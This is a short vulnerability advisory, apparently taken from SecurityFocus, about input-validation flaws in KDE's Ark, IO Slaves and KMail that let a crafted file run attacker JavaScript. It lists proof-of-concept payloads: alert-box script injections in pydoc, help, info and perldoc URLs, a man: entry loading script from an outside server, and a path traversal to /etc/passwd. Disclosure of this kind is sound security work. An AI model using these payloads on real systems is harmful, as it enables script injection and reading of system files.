13 lines
No EOL
751 B
Text
13 lines
No EOL
751 B
Text
source: http://www.securityfocus.com/bid/36845/info
|
|
|
|
KDE is prone to multiple input-validation vulnerabilities that affect 'Ark', 'IO Slaves', and 'Kmail'.
|
|
|
|
An attacker can exploit these issues by tricking an unsuspecting victim into opening a malicious file. A successful attack will allow arbitrary attacker-supplied JavaScript to run in the context of the victim running the affected application.
|
|
|
|
pydoc:[html][body][script]alert('xss')[/script][/body][/html] - fixed in 3.5.10
|
|
man:[script src="http://server/test.js"] - fixed in 3.5.10
|
|
help:[script]alert('xss')[/script]
|
|
info:/dir/[script]alert('xss')[/script]
|
|
perldoc:[body onLoad="javascript:alert(1)"]
|
|
|
|
help:/../../../../../../../../../../../etc/passwd |